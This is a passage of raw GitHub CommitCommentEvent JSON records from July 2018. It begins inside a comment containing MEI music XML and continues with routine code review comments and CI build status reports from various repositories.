xml:id=\"accid-L9F2S1\" accid=\"n\" func=\"caution\" />\r\n                                        </note>\r\n                                        <note xml:id=\"note-L9F2S2\" oct=\"6\" pname=\"f\">\r\n                                            <accid xml:id=\"accid-L9F2S2\" accid=\"n\" func=\"caution\" />\r\n                                        </note>\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <staff xml:id=\"staff-L8F1N1\" n=\"2\">\r\n                                <layer xml:id=\"layer-L8F1N1\" n=\"1\">\r\n                                    <beam xml:id=\"beam-L9F1-L10F1\">\r\n                                        <chord xml:id=\"chord-L9F1\" dur=\"16\">\r\n                                            <note xml:id=\"note-L9F1S1\" oct=\"4\" pname=\"d\">\r\n                                                <accid xml:id=\"accid-L9F1S1\" accid=\"n\" func=\"caution\" />\r\n                                            </note>\r\n                                            <note xml:id=\"note-L9F1S2\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                            <artic xml:id=\"artic-L9F1\" artic=\"stacc\" />\r\n                                        </chord>\r\n                                        <chord xml:id=\"chord-L10F1\" dur=\"16\">\r\n                                            <note xml:id=\"note-L10F1S1\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L10F1S2\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                            <artic xml:id=\"artic-L10F1\" artic=\"stacc\" />\r\n                                        </chord>\r\n                                    </beam>\r\n                                </layer>\r\n                            </staff>\r\n                            <hairpin xml:id=\"hairpin-L9F3\" staff=\"1\" tstamp=\"1.000000\" tstamp2=\"0m+1.2\" form=\"dim\" vgrp=\"100\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L11\" right=\"dbl\">\r\n                            <staff xml:id=\"staff-L11F2N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L11F2N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L12F2\" dur=\"8\">\r\n                                        <note xml:id=\"note-L12F2S1\" oct=\"5\" pname=\"f\">\r\n                                            <accid xml:id=\"accid-L12F2S1\" accid=\"n\" func=\"caution\" />\r\n                                        </note>\r\n                                        <note xml:id=\"note-L12F2S2\" oct=\"6\" pname=\"f\">\r\n                                            <accid xml:id=\"accid-L12F2S2\" accid=\"n\" func=\"caution\" />\r\n                                        </note>\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <staff xml:id=\"staff-L11F1N1\" n=\"2\">\r\n                                <layer xml:id=\"layer-L11F1N1\" n=\"1\">\r\n                                    <beam xml:id=\"beam-L12F1-L13F1\">\r\n                                        <chord xml:id=\"chord-L12F1\" dur=\"16\">\r\n                                            <note xml:id=\"note-L12F1S1\" oct=\"4\" pname=\"d\">\r\n                                                <accid xml:id=\"accid-L12F1S1\" accid=\"n\" func=\"caution\" />\r\n                                            </note>\r\n                                            <note xml:id=\"note-L12F1S2\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                            <artic xml:id=\"artic-L12F1\" artic=\"stacc\" />\r\n                                        </chord>\r\n                                        <chord xml:id=\"chord-L13F1\" dur=\"16\">\r\n                                            <note xml:id=\"note-L13F1S1\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                            <note xml:id=\"note-L13F1S2\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                            <artic xml:id=\"artic-L13F1\" artic=\"stacc\" />\r\n                                        </chord>\r\n                                    </beam>\r\n                                </layer>\r\n                            </staff>\r\n                            <hairpin xml:id=\"hairpin-L12F3\" staff=\"1\" tstamp=\"1.000000\" tstamp2=\"0m+1.2\" form=\"dim\" vgrp=\"100\" />\r\n                        </measure>\r\n                    </section>\r\n                </score>\r\n            </mdiv>\r\n        </body>\r\n    </music>\r\n</mei>\r\n```"}},"created_at":"2018-07-05T09:59:01Z"}
{"id":"7922195259","type":"CommitCommentEvent","actor":{"login":"kostrzewa"},"repo":{"name":"HISKP-LQCD/sLapH-contractions"},"payload":{"comment":{"id":29604119,"position":47,"line":302,"path":"include/DilutedFactor.h","commit_id":"a4f909ef5929fb09d09a2c929d6c29e4ed7e280e","created_at":"2018-07-05T09:59:07Z","updated_at":"2018-07-05T09:59:07Z","author_association":"COLLABORATOR","body":"@martin-ueding @maowerner no static_cast required here?"}},"created_at":"2018-07-05T09:59:07Z"}
{"id":"7922195560","type":"CommitCommentEvent","actor":{"login":"Andre9642"},"repo":{"name":"Andre9642/BrailleExtender"},"payload":{"comment":{"id":29604120,"position":null,"line":null,"path":null,"commit_id":"e2c17d87edc47b194e0d6a52df8b7941d4284b2c","created_at":"2018-07-05T09:59:10Z","updated_at":"2018-07-05T09:59:10Z","author_association":"OWNER","body":"Closed #16"}},"created_at":"2018-07-05T09:59:10Z"}
{"id":"7922195804","type":"CommitCommentEvent","actor":{"login":"rmannibucau"},"repo":{"name":"eclipse/microprofile-config"},"payload":{"comment":{"id":29604121,"position":null,"line":null,"path":null,"commit_id":"a2c8964a26f61635c6c8c1a0edcbd353fada4e7d","created_at":"2018-07-05T09:59:13Z","updated_at":"2018-07-05T09:59:13Z","author_association":"NONE","body":"Works for me, thanks Emily."}},"created_at":"2018-07-05T09:59:13Z"}
{"id":"7926137270","type":"CommitCommentEvent","actor":{"login":"roman412"},"repo":{"name":"roman412/TorrentInfoGen"},"payload":{"comment":{"id":29615235,"position":null,"line":null,"path":null,"commit_id":"1d74df91793ec2e44f617a7fbc78c13e12ea772d","created_at":"2018-07-06T00:01:38Z","updated_at":"2018-07-06T00:01:38Z","author_association":"OWNER","body":"Также добавлен пакет SoxSharp на будущее для отрисовки спектров."}},"created_at":"2018-07-06T00:01:38Z"}
{"id":"7926137679","type":"CommitCommentEvent","actor":{"login":"sarah27h"},"repo":{"name":"sarah27h/FEND-restaurant-stage-1"},"payload":{"comment":{"id":29615236,"position":null,"line":null,"path":null,"commit_id":"eb0b2e2d242f426fe474829bf976849bcd791841","created_at":"2018-07-06T00:01:49Z","updated_at":"2018-07-06T00:01:49Z","author_association":"OWNER","body":"when I add /sw.js it gives me an error\r\nA bad HTTP response code (404) was received when fetching the script\r\nand registration failed"}},"created_at":"2018-07-06T00:01:49Z"}
{"id":"7926138264","type":"CommitCommentEvent","actor":{"login":"dealako"},"repo":{"name":"jlpogue3/rpc-gating"},"payload":{"comment":{"id":29615237,"position":8,"line":186,"path":"scripts/jirautils.py","commit_id":"ca62eed1a6bea3fc6db2635ad835c008f882c319","created_at":"2018-07-06T00:02:04Z","updated_at":"2018-07-06T00:02:04Z","author_association":"NONE","body":"Remove semi-colon?"}},"created_at":"2018-07-06T00:02:04Z"}
{"id":"7926151735","type":"CommitCommentEvent","actor":{"login":"cameronc137"},"repo":{"name":"JeffersonLab/remoll"},"payload":{"comment":{"id":29615268,"position":null,"line":null,"path":null,"commit_id":"f1762734561967e689b1dfbea99971731c2d833f","created_at":"2018-07-06T00:07:31Z","updated_at":"2018-07-06T00:07:31Z","author_association":"CONTRIBUTOR","body":"Ok, it works, I just had to set the track low energy neutrals to true as well so that it would keep track of the optical photons, which are naturally below 0.1MeV.\r\n\r\nThanks!"}},"created_at":"2018-07-06T00:07:31Z"}
{"id":"7926153441","type":"CommitCommentEvent","actor":{"login":"dealako"},"repo":{"name":"jlpogue3/rpc-gating"},"payload":{"comment":{"id":29615270,"position":null,"line":null,"path":null,"commit_id":"ca62eed1a6bea3fc6db2635ad835c008f882c319","created_at":"2018-07-06T00:08:11Z","updated_at":"2018-07-06T00:08:11Z","author_association":"NONE","body":"Looks good - wondering if we need to do anything fancy on the `jarautils.py` in the `build_failure_issue()` function.  E.g. I'm glad you added the default labels when none are provided.  I think this is correct, but was wondering if when labels are indeed provided to the function, do we want to \"force include\" certain labels anyway.  For example, should we always include/add the `job_name` even in the case where the user didn't provide it in their labels list?  This would require us to merge the two lists into one to ensure the default labels are included.  Dunno, just a thought.\r\n\r\nOtherwise, the logic looks correct."}},"created_at":"2018-07-06T00:08:11Z"}
{"id":"7926154954","type":"CommitCommentEvent","actor":{"login":"Ershilka"},"repo":{"name":"Pr0x13/iDict"},"payload":{"comment":{"id":29615273,"position":16,"line":16,"path":"files/wordlist.txt","commit_id":"8080009023bc56e6d25e89770f0690c40353664f","created_at":"2018-07-06T00:08:47Z","updated_at":"2018-07-06T00:08:47Z","author_association":"NONE","body":"Ershilka"}},"created_at":"2018-07-06T00:08:47Z"}
{"id":"7926160070","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29615286,"position":null,"line":null,"path":null,"commit_id":"b9f697153218335b0f24e8f6e9f32e49d46f96bd","created_at":"2018-07-06T00:10:54Z","updated_at":"2018-07-06T00:10:54Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 493](https://ci.hashicorp.engineering/viewLog.html?buildId=101530&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-06T00:10:54Z"}
{"id":"7926160963","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29615289,"position":null,"line":null,"path":null,"commit_id":"b9f697153218335b0f24e8f6e9f32e49d46f96bd","created_at":"2018-07-06T00:11:15Z","updated_at":"2018-07-06T00:11:15Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 493](https://ci.hashicorp.engineering/viewLog.html?buildId=101530&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:20"}},"created_at":"2018-07-06T00:11:15Z"}
{"id":"7926167206","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29615309,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-06T00:13:49Z","updated_at":"2018-07-06T00:13:49Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T00:13:49Z"}
{"id":"7926169016","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29615314,"position":null,"line":null,"path":null,"commit_id":"1726d15e5756c82daa45c3374d691139d2e76cee","created_at":"2018-07-06T00:14:36Z","updated_at":"2018-07-06T00:14:36Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-735](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-735).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-735-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-06T00:14:36Z"}
{"id":"7926172660","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29615324,"position":null,"line":null,"path":null,"commit_id":"77488ad8d12b0aa3973139a653dd08ef33d37b2a","created_at":"2018-07-06T00:16:07Z","updated_at":"2018-07-06T00:16:07Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#pr-127](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#pr-127).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-127-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-06T00:16:07Z"}
{"id":"7926174033","type":"CommitCommentEvent","actor":{"login":"callmenemo491"},"repo":{"name":"adsbypasser/adsbypasser"},"payload":{"comment":{"id":29615328,"position":null,"line":null,"path":null,"commit_id":"a00ff4f6bb6b73fbbeda52ada1a95c51faef0056","created_at":"2018-07-06T00:16:40Z","updated_at":"2018-07-06T00:16:40Z","author_association":"CONTRIBUTOR","body":"yep, this was part of the \"big refactor\" i was talking about... putting the links in some 'order'"}},"created_at":"2018-07-06T00:16:40Z"}
{"id":"7926178906","type":"CommitCommentEvent","actor":{"login":"stuartpreston"},"repo":{"name":"chef-cookbooks/windows"},"payload":{"comment":{"id":29615335,"position":null,"line":null,"path":null,"commit_id":"d6a276a63879488dea74c465d773642cbd5123f2","created_at":"2018-07-06T00:18:45Z","updated_at":"2018-07-06T00:18:45Z","author_association":"CONTRIBUTOR","body":"That wasn't my finding.  PowerShell 3.0 introduced [module autoloading](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_modules?view=powershell-6#module-auto-loading) and I just ran through it again to be sure:\r\n\r\n- **Windows 2008 R2 SP1 + PowerShell 2**\r\n<img width=\"512\" alt=\"win2008r2sp1-powershellv2-windowsfeature\" src=\"https://user-images.githubusercontent.com/6384654/42353680-017b9c8a-80ba-11e8-826c-deba2e0d6ac9.png\">\r\n\r\n- **Windows 2008 R2 SP1 + PowerShell 3**\r\n<img width=\"512\" alt=\"win2008r2sp1-powershellv3-windowsfeature\" src=\"https://user-images.githubusercontent.com/6384654/42353675-fb2dfc06-80b9-11e8-9f8b-466a74346567.png\">\r\n\r\n- **Windows 2008 R2 SP1 + PowerShell 4**\r\n<img width=\"512\" alt=\"win2008r2sp1-powershellv4-windowsfeature\" src=\"https://user-images.githubusercontent.com/6384654/42353682-0aa0ded8-80ba-11e8-9f63-c3a0e580e45e.png\">\r\n\r\nIt's only PowerShell 2.0 that required the Import-Module, so I hink this change is ok if we're targeting PowerShell 3.0 upwards, it only wouldn't work on an out-of-box Windows 2008 R2 SP1 machine."}},"created_at":"2018-07-06T00:18:45Z"}
{"id":"7926179952","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"antretterf/EnergyPlus"},"payload":{"comment":{"id":29615336,"position":null,"line":null,"path":null,"commit_id":"f3da7217b803b6bc1de06c6a9e9884b017ba381c","created_at":"2018-07-06T00:19:12Z","updated_at":"2018-07-06T00:19:12Z","author_association":"NONE","body":"HAMT1_180406 (antretterf) - Win64-Windows-7-VisualStudio-14: OK (2923 of 2928 tests passed, 13 test warnings)\n\nMessages:\n\n * 7 tests had: EIO diffs.\n * 2 tests had: ESO small diffs.\n * 2 tests had: Table small diffs.\n * 13 tests had: AUD diffs.\n * 1 test had: BND diffs.\n * 5 tests had: ESO big diffs.\n * 5 tests had: Table big diffs.\n * 2 tests had: MTD diffs.\n * 3 tests had: MTR big diffs.\n * 1 test had: ERR diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 620\n * Failed: 5\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.83%25-yellow.png)</a> \n"}},"created_at":"2018-07-06T00:19:12Z"}
{"id":"7926182802","type":"CommitCommentEvent","actor":{"login":"drochetti"},"repo":{"name":"esdoc/esdoc-plugins"},"payload":{"comment":{"id":29615344,"position":null,"line":null,"path":null,"commit_id":"0b39ea04b20b5cadcf3264e5e98d5ab526abd461","created_at":"2018-07-06T00:20:25Z","updated_at":"2018-07-06T00:20:25Z","author_association":"NONE","body":"This should have been published as an update to the plugin, like version `1.0.1`"}},"created_at":"2018-07-06T00:20:25Z"}
{"id":"7926183164","type":"CommitCommentEvent","actor":{"login":"MarkEWaite"},"repo":{"name":"jenkinsci/git-client-plugin"},"payload":{"comment":{"id":29615345,"position":71,"line":604,"path":"src/test/java/org/jenkinsci/plugins/gitclient/GitAPITestCase.java","commit_id":"637ae514811e381ab1b0294164594cce5849a7e1","created_at":"2018-07-06T00:20:32Z","updated_at":"2018-07-06T00:20:32Z","author_association":"CONTRIBUTOR","body":"Yes, most of the tests require a command line git installed on the system.  Some of the tests are aware of the command line git version installed on the system.  The tests which are aware of specific command line git versions usually include a reference to the `isAtLeastVersion` method.\r\n\r\nI don't know what is different about your systems that causes the tests to fail when they run successfully on the list of systems listed above.\r\n\r\nI have one Ubuntu 16.04 system in my mix of systems which consistently fails several of the tests in CliGitAPIImplTest.  I have two other Ubuntu 16.04 systems which consistently pass those same tests.  That's the only inconsistency I've found in test results for the various platforms I listed above.\r\n\r\nUnfortunately, I don't know why you're seeing different results in your environment.  Any chance there is some form of web proxy or other filter between your systems and the public internet?"}},"created_at":"2018-07-06T00:20:32Z"}
{"id":"7926184826","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29615346,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-06T00:20:56Z","updated_at":"2018-07-06T00:20:56Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T00:20:56Z"}
{"id":"7926185949","type":"CommitCommentEvent","actor":{"login":"QuickUnit"},"repo":{"name":"BusinessAlpaca/MyProjectEulerWork"},"payload":{"comment":{"id":29615350,"position":27,"line":27,"path":"N014Collatz10.java","commit_id":"1a60b1fb4298de98820405f1c0d2144c8287616c","created_at":"2018-07-06T00:21:22Z","updated_at":"2018-07-06T00:21:22Z","author_association":"CONTRIBUTOR","body":"Here's where you could optimize."}},"created_at":"2018-07-06T00:21:22Z"}
{"id":"7926189058","type":"CommitCommentEvent","actor":{"login":"QuickUnit"},"repo":{"name":"BusinessAlpaca/MyProjectEulerWork"},"payload":{"comment":{"id":29615354,"position":31,"line":31,"path":"N014Collatz10.java","commit_id":"1a60b1fb4298de98820405f1c0d2144c8287616c","created_at":"2018-07-06T00:22:42Z","updated_at":"2018-07-06T00:22:42Z","author_association":"CONTRIBUTOR","body":"Use braces more. It's an art form to know when to drop them, and until you know - opt for adding them."}},"created_at":"2018-07-06T00:22:42Z"}
{"id":"7926208230","type":"CommitCommentEvent","actor":{"login":"komarikl"},"repo":{"name":"IrinaKondrateva/june-loftschool-react-homeworks"},"payload":{"comment":{"id":29615397,"position":17,"line":9,"path":"src/reducers/search.js","commit_id":"3febcad07cd6d65cba6a7b86a9acdc4d19e15ece","created_at":"2018-07-06T00:30:58Z","updated_at":"2018-07-06T00:30:58Z","author_association":"NONE","body":"у тебя просто опечатка в actions/search.js на 6 строке **'SEARCH_FAILURE'**"}},"created_at":"2018-07-06T00:30:58Z"}
{"id":"7926215142","type":"CommitCommentEvent","actor":{"login":"komarikl"},"repo":{"name":"IrinaKondrateva/june-loftschool-react-homeworks"},"payload":{"comment":{"id":29615401,"position":48,"line":27,"path":"src/components/ShowPage/ShowPage.js","commit_id":"3febcad07cd6d65cba6a7b86a9acdc4d19e15ece","created_at":"2018-07-06T00:34:02Z","updated_at":"2018-07-06T00:34:02Z","author_association":"NONE","body":"если ты поставишь дебагер на строке с this.props или выведешь в консоль, то увидишь, что и name и id и все свойства объекта chosenSerial первоначально undefined, просто из-ща того, что ты не пытаешься обратиться к их методам и свойствам, ничего не ломается."}},"created_at":"2018-07-06T00:34:02Z"}
{"id":"7926216251","type":"CommitCommentEvent","actor":{"login":"angelr1076"},"repo":{"name":"angelr1076/astral"},"payload":{"comment":{"id":29615405,"position":null,"line":null,"path":null,"commit_id":"dee1942edc1f2323da70deeebdcb764542fd53d2","created_at":"2018-07-06T00:34:31Z","updated_at":"2018-07-06T00:34:31Z","author_association":"OWNER","body":"updated border-radius of portfolio images and made font size smaller. "}},"created_at":"2018-07-06T00:34:31Z"}
{"id":"7926216900","type":"CommitCommentEvent","actor":{"login":"angelr1076"},"repo":{"name":"angelr1076/astral"},"payload":{"comment":{"id":29615407,"position":null,"line":null,"path":null,"commit_id":"dee1942edc1f2323da70deeebdcb764542fd53d2","created_at":"2018-07-06T00:34:49Z","updated_at":"2018-07-06T00:34:49Z","author_association":"OWNER","body":"Removed Github icon. "}},"created_at":"2018-07-06T00:34:49Z"}
{"id":"7926220250","type":"CommitCommentEvent","actor":{"login":"sjackman"},"repo":{"name":"bcgsc/orca"},"payload":{"comment":{"id":29615411,"position":null,"line":null,"path":null,"commit_id":"9e201efe8554da4d8d2e73059beca43312bc2a45","created_at":"2018-07-06T00:36:20Z","updated_at":"2018-07-06T00:36:20Z","author_association":"MEMBER","body":"Fixed by https://github.com/brewsci/homebrew-science/pull/184 https://github.com/brewsci/homebrew-science/pull/185 https://github.com/brewsci/homebrew-science/pull/186"}},"created_at":"2018-07-06T00:36:20Z"}
{"id":"7926223452","type":"CommitCommentEvent","actor":{"login":"matkoch"},"repo":{"name":"JetBrains/resharper-devguide"},"payload":{"comment":{"id":29615416,"position":71,"line":71,"path":"Products/Rider.md","commit_id":"2b5394f5250709899599cb34cb0dba5fdb776b88","created_at":"2018-07-06T00:37:46Z","updated_at":"2018-07-06T00:37:46Z","author_association":"MEMBER","body":"Yep, that's outdated, I know :) Just forgot to push my latest changes."}},"created_at":"2018-07-06T00:37:46Z"}
{"id":"7926232012","type":"CommitCommentEvent","actor":{"login":"Smotko"},"repo":{"name":"baloncek2662/psywerx"},"payload":{"comment":{"id":29615425,"position":31,"line":29,"path":".circleci/config.yml","commit_id":"ddab365620522e445c0c432dfb2347e518c2517d","created_at":"2018-07-06T00:41:34Z","updated_at":"2018-07-06T00:41:34Z","author_association":"COLLABORATOR","body":"Hm... tuki mejhn mesas koncepte. Ce hoces uporabit docker potem ti ni treba imet run commanda, ki nalozi requirements.txt, ker se to zgodi ko pozenes docker container (poglej Dockerfile).\r\n\r\nCe zelis uporabit docker oz. docker-compose pa ne mors direkt docker-compose exec pognat, ker to tako kot, da bi se usedel v avto in zacel pritiskat na gas brez, da bi sploh imel kljuce 😂 Najprej je treba docker-compose startat (docker-compose up), sele potem lahko klices exec. Pa se tole `docker-compose exec psywerx bash` ne mors uporabit, ker `bash` command zacne nove interaktiven shell session. Ker circleci nima tipkovnice, s katero bi lahko uporabljal ta interaktiven session se ne bo nic zgodilo. Mogoce bi lahko izvedu `docker-compose exec psywerx python manage.py test irc web` ampak ne vem ce bo to delalo pa se zgleda malce grdo. Pod tocko 2. mas alternativo, ki se mi zdi da dela bolje.\r\n\r\n1. Ne uporabis dockerja in poskrbis, da se vsi dependenciji nalozijo v circleciju tako kot se v Dockerfileu:\r\n    * apt-get install mysql-client python-mysqldb\r\n    * pip install -r requirements.txt\r\n    * python manage.py test irc web\r\n2. Uporabis docker zato, da ti ni treba rocno instalirat dependencijev:\r\n    * setup_remote_docker\r\n    * docker-compose -f docker-compose.yml -f docker-compose.test.yml up --abort-on-container-exit\r\n\r\nAmpak, da bo to delalo moras dodat se docker-compose.test.yml file, ki bo dejansko pognal teste:\r\n\r\n```\r\nversion: \"2\"\r\nservices:\r\n  psywerx:\r\n    command: python manage.py test irc web\r\n```"}},"created_at":"2018-07-06T00:41:34Z"}
{"id":"7926233625","type":"CommitCommentEvent","actor":{"login":"Asuskf"},"repo":{"name":"DarioIza/Sistema-Contable-Arcano"},"payload":{"comment":{"id":29615429,"position":null,"line":null,"path":null,"commit_id":"f065771b08ecf49c283fb6c7a4f0d3faf5e6ca05","created_at":"2018-07-06T00:42:14Z","updated_at":"2018-07-06T00:42:14Z","author_association":"NONE","body":"as"}},"created_at":"2018-07-06T00:42:14Z"}
{"id":"7926236530","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29615435,"position":null,"line":null,"path":null,"commit_id":"6a075867b02f7d6f4f077a6733032347cd547cdf","created_at":"2018-07-06T00:43:32Z","updated_at":"2018-07-06T00:43:32Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2310 of 2310 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6a075867b02f7d6f4f077a6733032347cd547cdf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6a075867b02f7d6f4f077a6733032347cd547cdf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6a075867b02f7d6f4f077a6733032347cd547cdf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-06T00:43:32Z"}
{"id":"7926239662","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29615439,"position":null,"line":null,"path":null,"commit_id":"6a075867b02f7d6f4f077a6733032347cd547cdf","created_at":"2018-07-06T00:44:57Z","updated_at":"2018-07-06T00:44:57Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6a075867b02f7d6f4f077a6733032347cd547cdf-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-06T00:44:57Z"}
{"id":"7926243863","type":"CommitCommentEvent","actor":{"login":"ekhanunimelb"},"repo":{"name":"UoM-ResPlat-DevOps/uom-cloud-dashboard"},"payload":{"comment":{"id":29615446,"position":null,"line":null,"path":null,"commit_id":"b6d9d2b43987f0239b6d0879c7ae88024d08ecf6","created_at":"2018-07-06T00:46:48Z","updated_at":"2018-07-06T00:46:48Z","author_association":"COLLABORATOR","body":"This bug may have been introduced by changes to `modelformset_factory()` in Django 1.8.1 https://github.com/django/django/commit/ee4edb1eda2ac8f09eb298929282b44776930c89"}},"created_at":"2018-07-06T00:46:48Z"}
{"id":"7926246491","type":"CommitCommentEvent","actor":{"login":"XDKlein"},"repo":{"name":"XDKlein/forth"},"payload":{"comment":{"id":29615448,"position":null,"line":null,"path":null,"commit_id":"e147cb0c0f120ff06b22b57742724ce3af947ffa","created_at":"2018-07-06T00:48:03Z","updated_at":"2018-07-06T00:48:03Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Графика: переделать связи.](https://trello.com/c/35PABeGo/32-%D0%B3%D1%80%D0%B0%D1%84%D0%B8%D0%BA%D0%B0-%D0%BF%D0%B5%D1%80%D0%B5%D0%B4%D0%B5%D0%BB%D0%B0%D1%82%D1%8C-%D1%81%D0%B2%D1%8F%D0%B7%D0%B8)"}},"created_at":"2018-07-06T00:48:03Z"}
{"id":"7926248594","type":"CommitCommentEvent","actor":{"login":"taneliang"},"repo":{"name":"nusmodifications/nusmods"},"payload":{"comment":{"id":29615449,"position":null,"line":null,"path":null,"commit_id":"8b1e795a5bb0e21e951ef52d6a104e0d6e1aa2c3","created_at":"2018-07-06T00:49:01Z","updated_at":"2018-07-06T00:49:01Z","author_association":"MEMBER","body":"The tests aren't mocking the config, and the code that generates the URLs (api/nusmods.js) isn't what's being tested here.\r\n\r\nI couldn't find a way to mock the config/app-config.json file, so I've mocked api/nusmods.js instead in https://github.com/nusmodifications/nusmods/pull/1035/commits/fc08b8e92a6c38684e55e7bec8fe5bc2b0bdffa3. This isn't great though; it's leaking implementation detail. Feel free to take over if you have a better approach :)"}},"created_at":"2018-07-06T00:49:01Z"}
